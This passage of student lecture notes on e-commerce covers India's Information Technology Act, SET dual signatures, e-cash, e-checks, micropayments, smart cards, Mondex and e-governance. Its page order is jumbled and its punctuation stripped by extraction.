has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
